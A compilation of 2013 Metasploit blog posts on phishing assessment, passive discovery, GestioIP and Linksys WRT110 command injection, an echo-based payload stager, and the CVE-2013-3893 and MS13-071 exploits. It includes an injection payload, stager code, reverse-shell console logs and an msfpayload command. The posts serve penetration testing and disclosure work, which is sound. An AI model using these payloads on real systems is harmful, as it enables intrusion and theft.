Skip navigation
All Places > Metasploit > Blog
15 16 17 18 19 Previous Next

Metasploit

665 posts

When you're assessing the exposure to phishing in your organization, one important part are the client-side vulnerabilities that would enable a malicious attacker to exploit a browser. In this blog post, I'd like to outline a non-invasive (and free!) way to get visibility into your client-side risk landscape.

 

There are essentially two ways to use phishing as part of your security program.


  • Phish 2 Pwn: If you are a penetration tester, you'll likely use spear phishing of a couple of users to compromise a machine to gain a first foothold in the network and then pivot from there.
  • Phish 2 Educate: Phishing as part of your security program uses simulated phishes to see how many of your users would click on a link or enter credentials on a fake form.

 

Metasploit Pro offers phishing options for both Phish 2 Pwn and Phish 2 Educate. For this blog post, we'll focus on the latter. With Metasploit, you would typically set up your phishing email, containing a link to a landing page, which could be used to do any of the following:

 

  • Exploiting the browser or its plugins
  • Displaying a fake login page to harvest credentials (e.g. OWA login page)
  • Tracking click-throughs
  • Delivering security awareness training
  • Any combination of the above

 

Some phishing projects don't allow you to exploit clients, but there is a great way to determine client-side vulnerabilities using a free Rapid7 product called BrowserScan. Think of BrowserScan like Google Analytics for client-side vulnerabilities: You embed an invisible JavaScript snippet in your landing page and view the vulnerabilities in your BrowserScan dashboard. It records both browser and plugin vulnerabilities. While a vulnerability management, such as Nexpose, can give you this kind of information about clients inside your network, BrowserScan gives you the vulnerability ratings of the machine actually used by the user, such as the user's home PC.

 

Here's how you do it:

 

  1. Create your free BrowserScan account
  2. Click on Tracking and choose the Transparent badge, which is not visible when the user visits the page
  3. Embed the JavaScript code in your phishing landing page

 

BrowserScan1.png

 

Once you have run your phishing campaign, you'll be able to see the the results of the vulnerable scanners in your BrowserScan Dashboard:

 

browserscan7.jpg

 

You can view the number of vulnerable clients overall or by a particular plugin. Here's Oracle Java by vulnerability status:

 

browserscan6.jpg

 

You can also see the breakdown by version number:

 

browserscan5.jpg

 

BrowserScan is not only limited to your phishing campaigns - you can also host it on other web pages, e.g. your intranet page or a frequently used internal web application, to get a quick, easy, and free view of your users' security posture, no matter where they may access the page from. You can even include a badge on your intranet page that gives the user instant feedback of their security posture. You may even consider this for your phishing training page:

BrowserScan3.jpg

Want to give this a try? Create your free BrowserScan account now!

Updates to the ROPDB

Hey, remember last week when we shipped that unpatched MSIE exploit?  Yeah, good times. Well, first off, it's patched now, so get yourself revved up to at least MS13-080 to protect against CVE-2013-3893. That said, the story's not quite over yet.

 

Just about a year ago, Wei sinn3r Chen and Juan Vazquez put together the Return-Oriented Programming Database, or ROPDB. This innovation provides exploit writers a fairly generic mechanism to come up with useful ROP chains from a stock of known-good DLLs.

 

Fast-forward to today. If you'll remember from sinn3r's exploit for MS13-080, the in-the-wild exploit was using an Office DLL to avoid tripping up on DEP (Data Execution Prevention) -- in other words, to skip past DEP by using a ROP chain. This week, you'll find new options for using ROP chains found in shipping versions of Office 2007 and Office 2010. Turns out, many-to-most users of Internet Explorer also tend to have a version of Office installed, so exploiting MSIE bugs by using Office's shipped version of hxds.dll is a pretty safe bet.  Incidentally, hxds.dll is a registered handler for "ms-help://" URI scheme, so it's available from MSIE-land.

 

In addition to this, the other ROP chains were reviewed and updated, so you should find some more reliability in the already-shipping chains for msfvcrt.dll and java.dll.

 

In other MSIE exploit news, you may have seen the report about another 0-day that was floating around for a month, also patched by MS13-080. The fact that it was known to vendors and some researchers to be circulating in the wild for a whole month with no fixit, no public alert, and no Metasploit module to let defenders test their defenses is a little disconcerting, but never mind all that -- we have a line on a sample for CVE-2013-3897 as well, so expect that to be released here Real Soon Now.

 

New Modules

We're shipping six new modules this week -- 5 exploits, and the one bruteforcer auxiliary module for Sentry Switched CDU. If you watch the open source diffs, you'll notice that community contributor Christian FireFart Mehlmauer apparently got sick and tired of seeing the "rport" and "peer" methods defined in about 50 different modules, and did some housekeeping. Thanks FireFart!

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

passive.jpgOne of the first steps in your penetration test is to map out the network, which is usually done with an active scan. In situations where you need to be stealthy or where active scanning may cause instability in the target network, such as in SCADA environments, you can run a passive network scan to avoid detection and reduce disruptions. A passive network scan stealthily monitors broadcast traffic to identify the IP addresses of hosts on the network. By initially running a passive scan, you can identify known hosts while evading network monitoring tools, such as intrusion detection systems (IDS). The data obtained from a passive network scan can be used to perform a targeted active scan with Metasploit’s Discovery Scan.

 

passive-network-discovery-metamodule.jpg

Metasploit Pro's Passive Network Discovery MetaModule

The Passive Network Discovery MetaModule available in Metasploit Pro runs a live packet capture on a specific network interface to capture DHCP requests and ARP requests. If you want to have more granular control over the packet capture or you want to reduce the size of the packet capture, you can use Berkeley Packet Filters (BPF) to specify the types of packets that the MetaModule captures.

 

The packet capture runs until it reaches the maximum Pcap file size or the time limit you have configured for the MetaModule. When the MetaModule run completes, it stores the captured data and generates a comprehensive report of its findings.

 

Sniffing the Network in Switched Networks

Most networks today are switched, which makes sniffing traffic harder. Unlike a hub, a switch only transmits the packets on the port of the target host instead of broadcasting it to the entire network. While this is great for minimizing traffic, it means that you'll only see packets that were meant for your machine, which defeats the point if you're trying to use network sniffing for discovering hosts on the network.

 

However, some manufacturers add ports for network analysis on the router that show you all traffic on the switch. Depending on the manufacturers, the ports are called Port Mirroring, Switched Port Analyzer (SPAN), or Roving Analysis Port (RAP). Depending on your model, you may have to switch on port mirroring in the switch's settings.

 

For detailed instructions on how to use this module, check out the Passive Network Discovery MetaModule Tutorial. If you don't have Metasploit Pro, you can download a fully functional Metasploit Pro 7-day trial.

GestioIP is an open-source IPAM (IP Address Management) solution available on Sourceforge, written in Perl.

 

There is a vulnerability in the way the ip_checkhost.cgi deals with pinging IPv6 hosts passed to it. If you pass an IPv4 address, the CGI uses a Perl library to perform the ping and return the results to the user.

 

However, this library doesn't seem to support IPv6 hosts, so the developer uses the ping6 utility to perform the ping of an IPv6 machine. The developer did perform some validation on the values being passed, but it wasn't sufficient and was able to be worked around.

 

The query string the CGI expects is

 

$QUERY_STRING =~ /ip=(.*)&hostname=(.*)&client_id=(.*)&ip_version=(.*)$/;


my $ip_ad=$1;
my $name=$2 || "";
my $client_id=$3 || "";
my $ip_version=$4 || "";



 

The first check the developer does is testing for any characters that the developer doesn't want in the query string:

 

if ( $ENV{'QUERY_STRING'} =~ /[;`'\\<>^%#*]/ ) {
        print_html($$lang_vars{max_signos_message}, $close);
        exit 1;
}



 

This presented some interesting restrictions on how to exploit the vulnerability.

 

Once the application has verified that the query string doesn't contain the bad characters (including a space, which isn't included in the previous code), the developer attempts to ensure the IP address is in the correct format.

 

if ( $ip_version eq "v4" ) {
        if ( $ip_ad !~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/ ) {
                print_html("<b>ERROR</b><p>$$lang_vars{ip_invalid_message}: $ip_ad","");
                exit 1;
        }
} elsif ( $ip_version eq "v6" ) {
        my $ip_ad_expand = ip_expand_address ($ip_ad,6);
        if ( $ip_ad_expand !~ /^\w+:\w+:\w+:\w+:\w+:\w+:\w+:\w+$/ ) {
                print_html("<b>ERROR</b><p>$$lang_vars{ip_invalid_message} $ip_ad","");
        }
}



 

You will notice that there is no 'else' statement, so if the ip_version param doesn't contain either 'ipv4' or 'ipv6', then no validation is done on the $ip_ad variable.

 

However, even if you were to pass in an ip_version of 'ipv6', the regex for the IPv6 address is not very strict at all.

 

Since an attacker can bypass any validation of the IP address before being passed to the ping6 command, the only thing left to do is figure out how to get around the first set of character restrictions.

 

I ended up using a few tricks to get around the fact that I couldn't use a space or a semi-colon. I finally settled on the following IP address in the request which creates a PHP script at the root of the web application.

 

2607:f0d0:$(echo${IFS}PD9waHAKCiAgcGhwaW5mbygpOwo/Pgo=|base64${IFS}--decode|tee${IFS}phpinfo.php):0000:0000:0000:0000:0004


 

I use ${IFS} instead of a space, which will be substituted by bash by a space. I also use | to go from one command to another and I base64 encode my actual payload to work around bad characters.

 

Once I figured out how to execute arbitrary commands (and figuring out my payload size couldn't be greater than about 450 characters), I knew how to write my Metasploit module:

 

gestioip.png

 

And with that, here's the Metasploit module that exercises the vulnerability and can test if you've applied the patch correctly -- the module will be available in the next update, or if you're tracking the Metasploit development branch directly, you can simply use msfupdate to get the goods.

MSIE exploit for CVE-2013-3893

This week, you might have seen some press on our new exploit for CVE-2013-3893, some of which engages in that favorite infosec dichotomy of full disclosure vs "responsible" disclosure. First, if you want some technical details on the exploit development process used by our own Wei @_sinn3r Chen, the bop on over to his blog post on CVE-2013-3893. If you're interested in a retort to the doomsayers about our philosophy of free and open exploit dev, feel free to read on.

 

There's some concern that since Metasploit released an exploit for this unpatched vulnerability, we're "compounding" the situation, making things worse. I have to say, I kind of don't buy the reasoning behind that for a couple reasons. To start, criminal users of exploits already had the goods; while we picked up our sample about a week before publishing the exploit, there's some intelligence that suggests that this vulnerability has been part of criminal campaigns since at least early August, 2013, and quite probably earlier.

 

An exploit going mainstream in the form of a Metasploit module can have the upside benefit of raising general awareness of the bug in question. This, in turn, can put pressure on vendors to issue patches. We saw pretty much exactly that back in January: On January 11, we published an exploit for an unpatched vuln in Java, and there was similar hand-wringing about "responsible" exploit disclosure. Two days later, 7u11 was released. This kind of turnaround is exceedingly rare for Oracle. Was the availability of a Metasploit module the cause of the lickity-split patch release? You'll have to ask them, but it looks like a pretty solid cause-and-effect relationship to me. I don't know if this is going to play out exactly the same way for this MSIE bug. Microsoft does have a Fix-It available, and EMET 4.0 appears effective as well, so that does buy some time for concerned end users, but at least now it's not just bad guys who can test your end-user protection mechanisms.

 

Speaking of which, if your security posture depends on a lack of public exploits for 0-days, I have to say, you're kind of doing it wrong. "Defense in depth" is a security mantra for a reason. If your organization gets popped because of a client-side 0-day, I hope your incident response report contains some suggestions on how not to get owned the same way next time. You do have an IR plan, right? In the era of a hostile Internet, I don't think it's reasonable to rely on perfect software, nor is it reasonable to rely on limited availability of exploits where only criminals and shady government operations have access to attack tools.

 

So, I think Metasploit is pretty reasonable when we go about publishing exploits. We have a partial-secrecy disclosure policy that we stick to for what we believe to be truly unique zero-days, but when something serious is circulating on the Internet, we've found it's best for everyone to invite everyone to participate in the risk-assessment process.

 

New CMD stager for embedded devices

Okay, rant over. Let's talk about something more pleasant, like Joe Vennix's and Juan Vazquez's work on a new CMD stager for limited Linux platforms. You can read up on the vulnerability that started it and the research that followed at Juan's recent blog post. It's long, but totally worth it, and culminates in a reliable exploit for CVE-2013-3568 for Linksys routers. This work is available now in the latest Metasploit update, revolving around using plain old "echo" to construct a payload on the victim device.

 

Since this was published, we have a new, possibly even better version, that uses the shell-builtin "printf" function (common to all POSIX-compliant shells) in the form of Pull Request #2412 from community contributor Markus mwulftange Wulftange. We'll be probing the limits of this technique's portability soon, so look for it in an upcoming update.

 

Hitting up unattend.xml for passwords

Finally, I'd like to hilight a module we've landed from community contributor Ben @Meatballs__ Campbell. Turns out, when Windows is installed using a scripted installation -- which is common for many corporate environments -- the unattended "answer file" is often left behind on the installed system. This can contain lots of juicy sensitive data, not the least of which are default local administrator passwords. Ben's module makes short work of these, and honestly, and checking to see if a compromised target has this trove of info should be part of any penetration testing engagement.

 

Note that clearing sensitive data is part of normal post-installation, but there are several ways this sanitation can fail, as discussed on Christopher Blake's blog, here. So, to defend against this info-leak, system administrators are advised to be on the lookout for these installation artifacts, lest they fall into the hands of your industrious local penetration tester.

 

New Modules (and much more!)

Including the four discussed above, we've got eight new modules this week, including a new exploit for Nodejs (with an accompanying "ARCH_NODEJS" payload, which is exciting), and exploits for Astium, ZeroShell, and freeFTPd. There's a ton of other exciting new fixes and content in this release I didn't get a chance to highlight as well, most notably, the fact that this update bumps Metasploit to version 4.7.1, so that means new bins for Nmap, Postgres, and updated Rails and other Ruby gems. So, your total update size is going to be bigger than usual.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Introduction

 

Earlier this summer Craig Young posted on Bugtraq about a root command injection vulnerability on the Linksys WRT110 router. This was a nice one because because the request, basic authentication protected, is also exploitable through CSRF:

 

bugtraq.png

Our awesome Joe Vennix figured out the vulnerability and how to exploit it to get a session, even on a restricted Linux environment like the Linksys one. Since the experience can be useful for others exploiting embedded devices, here it is!

 

The Vulnerability

 

The exploit, a command injection vulnerability, can be found on the http service assembler, specifically on the cgi_ping handler, reachable from the web interface. The vulnerable code gets the usercontrolled "pingstr" from the HTTP query:

 

.text:0040FFB0 loc_40FFB0:                              # CODE XREF: cgi_ping+2D8 j
.text:0040FFB0                la      $t9, atoi
.text:0040FFB4                nop
.text:0040FFB8                jalr    $t9 ; atoi
.text:0040FFBC                nop
.text:0040FFC0                lw      $gp, 0xE0+var_C8($sp)
.text:0040FFC4                nop
.text:0040FFC8                la      $a0, 0x460000
.text:0040FFCC                nop
.text:0040FFD0                addiu  $a0, (aPingstr - 0x460000)  # "pingstr"
.text:0040FFD4                move    $s0, $v0
.text:0040FFD8                la      $t9, get_cgi
.text:0040FFDC                nop
.text:0040FFE0                jalr    $t9 ; get_cgi
.text:0040FFE4                nop
.text:0040FFE8                lw      $gp, 0xE0+var_C8($sp)
.text:0040FFEC                bnez    $v0, loc_410000













 

Builds the command line using the sprintf function with with user controlled data:

 

.text:00410000
.text:00410000 loc_410000:                              # CODE XREF: cgi_ping+328 j
.text:00410000                                          # DATA XREF: .got:10001E24 o
.text:00410000                move    $a2, $s1
.text:00410004                move    $a3, $s0 ; user controlled data from "pingstr"
.text:00410008                addiu  $a0, $sp, 0xE0+var_C0 ; store the resulting command
.text:0041000C                la      $a1, 0x460000
.text:00410010                nop
.text:00410014                addiu  $a1, (aPingFCDSDS - 0x460000)  # "ping -f -c %d -s %d %s &"
.text:00410018                sw      $v1, 0xE0+var_D0($sp)
.text:0041001C                la      $t9, sprintf
.text:00410020                nop
.text:00410024                jalr    $t9 ; sprintf
.text:00410028                nop
.text:0041002C                lw      $gp, 0xE0+var_C8($sp)
.text:00410030                b      loc_4100E8
.text:00410034













 

And finally executes it through system, making it vulnerable to command injection:

 

.text:004100E8 loc_4100E8:                              # CODE XREF: cgi_ping+36C j
.text:004100E8                la      $a0, 0x460000
.text:004100EC                nop
.text:004100F0                addiu  $a0, (aMarmotPingStrS - 0x460000)  # "marmot: ping str %s\n"
.text:004100F4                addiu  $a1, $sp, 0xE0+var_C0
.text:004100F8                la      $t9, printf
.text:004100FC                nop
.text:00410100                jalr    $t9 ; printf
.text:00410104                nop
.text:00410108                lw      $gp, 0xE0+var_C8($sp)
.text:0041010C                addiu  $a0, $sp, 0xE0+var_C0 ; The command built from user controlled data
.text:00410110                la      $t9, system
.text:00410114                nop
.text:00410118                jalr    $t9 ; system
.text:0041011C                nop
.text:00410120                lw      $gp, 0xE0+var_C8($sp)
.text:00410124













 

Unfortunately, even with the ability to execute arbitrary commands, getting a session on a Linksys WRT110 wasn't so straightforward. This was because of a very restricted busybox environment, a lack of utilities such as wget, openssl, and daemons like telnetd. On this environment, Joe was still able to launch a stager by injecting echo commands, enabling interpretation of backslash escapes ("-e" flag). Some of you may also find Metasploit's new CMD stager useful for exploiting other restricted Linux environments.

 

The New CMD Stager


Following we're going to review the basics of the new stager. First of all, a new Rex::Exploitation::CmdStagerBase subclass is provided, Rex::Exploitation::CmdStagerEcho. This class will get the final payload, embed it into an ELF file, and generate the necessary commands to drop it to filesystem, execute and clean it. We're going to review the most interesting methods CmdStagerEcho is overriding in order to provide the new stager:


  • generate: This method is overridden to ensure opts[:path] is a correct *nix path, and finally calls the parent method, who generates the cmd payload including the decoding of an encoded payload, execution and cleanup commands.

 

def generate(opts = {})
  opts[:temp] = opts[:temp] || '/tmp/'
  opts[:temp].gsub!(/\\/, "/")
  opts[:temp] = opts[:temp].shellescape
  opts[:temp] << '/' if opts[:temp][-1,1] != '/'
  super
end









 

  • generate_cmds: This method is overridden to set the extra byte count (in order to split correctly the original file with the payload). Also set the start/end of the commands, which are the commands around every part of the original file with the payload.

 

def generate_cmds(opts)
  @cmd_start = "echo -en "
  @cmd_end  = ">>#{@tempdir}#{@var_elf}"
  xtra_len = @cmd_start.length + @cmd_end.length + 1
  opts.merge!({ :extra => xtra_len })
  super
end














 

  • encode_payload: This method must be overridden in order to encode the payload if necessary. In this case, the String containing the ELF with the payload musb be incoded into a "\\x55\\xAA" hex format that echo understands, where interpretation of backslash escapes is enabled.

 

def encode_payload(opts)
  return Rex::Text.to_hex(@exe, "\\\\x")
end















  • slice_up_payload: This method take a string of data (the encoded payload) and turn it into an array of usable pieces (parts). That's used to circumvent limitations on the executed command length. This method must be overridden because the, on the current stager, the representation of an hex byte cannot be split:

 

def slice_up_payload(encoded, opts)
  encoded_dup = encoded.dup


  parts = []
  xtra_len = opts[:extra]
  xtra_len ||= 0
  while (encoded_dup.length > 0)
    temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
    # cut the end of the part until we reach the start
    # of a full byte representation "\\xYZ"
    while (temp.length > 0 && temp[-5, 3] != "\\\\x")
      temp.chop!
    end
    parts << temp
    encoded_dup.slice!(0, temp.length)
  end


  parts
end



















  • parts_to_commands: This method combines the parts of the encoded file with the stuff that goes before / after it, in order to generate every command:

 

def parts_to_commands(parts, opts)
  cmds = []
  parts.each do |p|
    cmd = ''
    cmd << @cmd_start
    cmd << p
    cmd << @cmd_end
    cmds << cmd
  end

  cmds
end














 

  • generate_cmds_decoder: since there is no decoding task in this stager (echo with the "-e" flags allow to write binary contents to the file directly), this method is overridden just to provide the commands necessary to drop, chmod, and execute the binary payload, and then optionally delete it after executing:

 

def generate_cmds_decoder(opts)
  cmds = []
  # Make it all happen
  cmds << "chmod +x #{@tempdir}#{@var_elf}"
  cmds << "#{@tempdir}#{@var_elf}"

  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    cmds << "rm -f #{@tempdir}#{@var_elf}"
  end

  return cmds
end










 

Once the new Rex class is ready, the next step is to provide a new Exploit mixin so modules for command injection vulnerabilities can easily use it to get a new session. In order to provide a new CmdStager mixin, it should include the CmdStager interface, define a create_stager method, and override any other methods if necessary. In this case, just defining create_stager to return a new Rex::Exploitation::CmdStagerEcho instance is all what is needed:

 

####
# Allows for staging cmd to arbitrary payloads through the CmdStagerEcho.
#
# This stager uses the echo's "-e" flag, that enable interpretation of
# backslash escapes, to drop an ELF with the payload embedded to disk.
# The "-e" flag is usually available on linux environments. This stager
# has been found useful on restricted linux based embedded devices.
####

module Exploit::CmdStagerEcho

  include Msf::Exploit::CmdStager

  # Initializes a CmdStagerEcho instance for the supplied payload
  #
  # @param exe [String] The payload embedded into an ELF
  # @return [Rex::Exploitation::CmdStagerEcho] Stager instance
  def create_stager(exe)
    Rex::Exploitation::CmdStagerEcho.new(exe)
  end
end














 

Getting shells

 

Once here, an exploit can profit off the new CMD stager by including the new mixin (Msf::Exploit::CmdStagerEcho), calling the execute_cmdstager from the exploit method, and define the execute_command method. This method should allow to execute an arbitrary command, through the exploited vulnerability. In the CVE-2013-3568 case, an HTTP POST query with the command injection in the 'pingstr' variable is sent:

 

# Run the command on the router
def execute_command(cmd, opts)
  send_request_cgi({
    'uri' => '/ping.cgi',
    'method' => 'POST',
    'vars_post' => {
      'pingstr' => '& ' + cmd
    }
  })
end














 

Finally, time to enjoy shells!

 

msf exploit(linksys_wrt110_cmd_exec_stager) > show options

Module options (exploit/linux/http/linksys_wrt110_cmd_exec_stager):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin            no        Password to login with
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.1      yes       The address of the router
   RPORT     80               yes       The target port
   TIMEOUT   20               no        The timeout to use in every request
   USERNAME  admin            yes       Valid router administrator username
   VHOST                      no        HTTP server virtual host


Payload options (linux/mipsle/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux mipsel Payload


msf exploit(linksys_wrt110_cmd_exec_stager) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.100:4444 
[*] 192.168.1.1:80 - Trying to login with admin:admin
[+] 192.168.1.1:80 - Successful login admin:admin
[*] Command Stager progress -  90.69% done (2046/2256 bytes)
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.1:32771) at 2013-09-16 14:41:48 -0500

[*] Command Stager progress - 100.00% done (2256/2256 bytes)

ls
AdminDiag.htm
AdminManage.htm
AdminRebootConfig_Clicked.htm
AdminRebootConfig_Clicked_reboot.htm
AdminReport.htm
AdminRestore.htm
AdminRouting.htm
AdminUpgrade.htm
AdminUpgradeFail.htm
AdminUploadConfigFail.htm
AdvancedWirelessSettings.htm
AppDDNS.htm
AppDDNSDYN.htm
AppDDNSDYN_msg.htm
AppDDNSTZO.htm
AppDDNSTZO_msg.htm
AppDDNSURL.htm
AppDMZ.htm
AppDMZDHCPClientTable.htm
.
.
.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

msie.jpeg.jpgRecently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

 

The nitty gritty

 

We started noticing CVE-2013-3893 almost two weeks ago, but during that time we couldn't find a sample of it, so I asked publicly, and waited. Luckily our Metasploit contributor @binjo found a sample on Jsunpack, and was kind enough to share that information with me. Since this bug has been going on for awhile, plus I'm releasing a Metasploit module for it, there's no point to hide it, so here you go.  If you want a cleaner version of the trigger for debugging purposes, you can get it here. A brief technical writeup about the bug can be found on Microsoft's TechNet Blog here.

 

The vulnerability affects Internet Explorer from 6 all the way to 11, however, the exploit in the wild primarily targets Internet Explorer 8 on Windows XP, and Internet Explorer 8 and 9 on Windows 7. This part is a little confusing, because there's more to it:

 

For IE8 with XP, the exploit fingerprints regions such as English, Chinese (including Taiwan, Hong Kong, China, Singapore), French, German, Japanese, Portuguese, Korean, and Russian. However, it is only tweaked for English, Chinese, Japanese, and Korean, which makes sense because XP is still pretty popular in Asian countries. This also just means a portion of the fingerprinting code seems junk, and appears to be reused since at least 2012, as this malicious MS12-037 code indicates. Perhaps these exploits are from the same exploit pack with the same library, I don't know for sure.

 

Windows 7 targets don't seem to have this language restriction. Instead, the exploit would try against any Windows 7 machines (IE8/IE9) as long as Office 2007 or Office 2010 is installed.  This is because the Microsoft Office Help Data Services Module (hxds.dll) can be loaded in IE, and is required to leverage Return-Oriented Programming in order to bypass DEP and ASLR, and gain arbitrary code execution. The fingerprinting code for Office is also reused.

 

Hopefully the above clarifies about who the targets are. However, I should also remind everyone again that the vulnerability affects IE 6/7/8/9/10/11. So at any moment this exploit can be improved to target more users around the world, if not already.

 

 

"If you build it, nerds will come"

 

The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed, as the following screenshots demonstrate:

 

ie_setmousecapture_uaf firing against IE 9 on Windows 7 SP1 with Microsoft Office 2007:

Screen Shot 2013-09-29 at 10.15.36 PM.png

 

ie_setmousecapture_uaf firing against IE 9 on Windows 7 SP1 with Microsoft Office 2010:

Screen Shot 2013-09-29 at 10.18.24 PM.png

 

 

Go Ninja!

 

The CVE-2013-3893 exploit can be obtained by using the msfupdate utility in Metasploit Framework, and feel free to fire up that bad boy. If you are on Metasploit Pro, this exploit is expected to go to the upcoming update, and you can check this through the Software Updates menu under Administration. If you are new to Metasploit, you can get started by downloading the software here.

 

Update

 

Oct 8th 2013 - Security update MS13-080 is available.

Let's Curbstomp Windows!

This week, we've got two new exploits for everyone's favorite punching bag, Microsoft Windows. First up, we'll take on Microsoft Internet Explorer. MSIE has a long and storied history of browser bugs, but truth be told, they're really pretty hard to exploit reliably these days. If you don't believe me, take a look at the hoops we had to jump through to get reliable exploits together for MS13-069.

 

MS13-069 was released on September 10, 2013 to address at least 10 vulnerabilies, one of them being CVE-2013-2305. This is the "Caret Use-After-Free" vulnerability, discovered and reported to Microsoft by friend of the show, corelanc0d3r. This module, written by Wei sinn3r Chen, is pretty well commented and, for extra points, uses a custom ROP chain.  So, if you're looking to start your stylish and dangerous career as a MSIE bug hunder, you'd do worse than to study the notes on this module.

 

The other Windows exploit is for MS13-071, which patched the Windows Theme system for Windows versions prior to Windows 7. This module is particularly neat because while it's file format exploit, it comes with the option of firing up your own UNC server from within Metasploit. This was written by The World's Friendliest Exploit Dev, Juan Vazquez, and he discusses it at length in his blog post, where he discusses the path to remote code execution in detail.

 

Serving up file format exploits over a temporary SMB share point is pretty new (and requires you to run Metasploit as root on a non-Windows system, like Kali Linux), so it's only supported in this module on an experimental basis. If this kind of thing turns out to be useful, we can look at promoting the code involved to the SMB server mixin proper, as well as getting a better WebDAV server running as well.

 

Hashtag Contest!

We're also kicking off a Twitter hashtag-based contest for some sweet Metasploit T-shirts (because we seriously have a huge pile of these since our last design contest), and a pair of stylish (read: bright orange) Beats By Dre noise-cancelling headphones, perfect for use with Metasploit's microphone spying modules. You can read up on the details over on the Infosec Community blog post, by Rapid7 community manager Patrick Hellen.

 

New Modules

Including the two discussed above, we've got nine new modules this week, all of them exploits.

 

Exploit modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Recently we've added an exploit for MS13-071 to Metasploit. Rated as "Important" by Microsoft, this remote code execution, found by Eduardo Prado, for Windows XP and Windows 2003 environments is achieved by handling specially crafted themes. In this blog post we would like to discuss the vulnerability and give some helpful tips for exploiting it from Metasploit.

 

First of all, the bug occurs while handling the [boot] section on .theme files, where an arbitrary path can be used as screen saver:

 

 

boot_section.png

 

Since SCR files are just Windows executables, the vulnerability can be exploited by locating a malicious EXE on a shared folder, and distributing a malicious .theme referencing the remote screen saver, for example "SCRNSAVE.EXE=\\host\share\exploit.scr". When the victim opens the .theme and visits the Screen Saver tab the payload will be executed:

 

payload_exec.png

 

The code execution is also triggered if the victim installs the malicious theme and stays away from the computer, when Windows tries to display the screensaver.

 

In order to solve it, the Microsoft patch adds a new function, EnsureInfoxScreenSaver(), which tries to verify the screen saver path:

 

patch.png

 

With the vulnerability analyzed, writing a file format exploit and exploit it isn't hard if you take two things into account:

 

  • There is a malicious .theme file which the victim must open
  • There is a payload embedded into an exe, and masked as scr, which must be distributed through a shared folder.

 

That said, we're going to see how to use the current Metasploit, which allows two operation modes:

 

  • Use an external shared resource (Samba Server or Windows shared folder) to deploy the malicious screen saver. In this case:


1) Configure the UNCPATH option:

 

msf exploit(ms13_071_theme) > set UNCPATH \\\\192.168.172.243\\exploit\\exploit.scr
UNCPATH => \\192.168.172.243\exploit\exploit.scr
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Remember to share the malicious EXE payload as \\192.168.172.243\exploit\exploit.scr
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme

 

2) Deploy the payload, embedded into an exe, on the UNCPATH location:

 

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.172.1 LPORT=4444 X > /tmp/exploit.scr

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: {"LHOST"=>"192.168.172.1", "LPORT"=>"4444"}

 

3) Finally run a handler for the payload, distribute the malicious .theme file (generated on 1) ) and wait for sessions:

 

msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1668) at 2013-09-18 13:57:25 -0500

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

 

 

  • Use the embedded SMBServer support into the module. In this case, just configure the SRVHOST option to listen on an address reachable by the victims, and let the embedded SMBServer mixin to work. Distribute the .theme file and wait for the sessions:

 

msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\JalVNbsrN\sCOmK.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 192.168.172.203
